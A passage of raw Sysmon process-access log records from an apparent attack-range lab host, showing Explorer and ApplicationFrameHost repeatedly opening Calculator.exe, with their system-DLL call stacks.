Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360339Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360338Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360337Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360336Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.749{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360335Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 10341000x8000000000000000360334Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360333Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360332Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360331Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360330Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360329Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360328Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.733{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360327Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360326Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360325Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360324Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360323Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360322Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360321Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360320Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360319Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.718{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360318Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360317Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360316Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 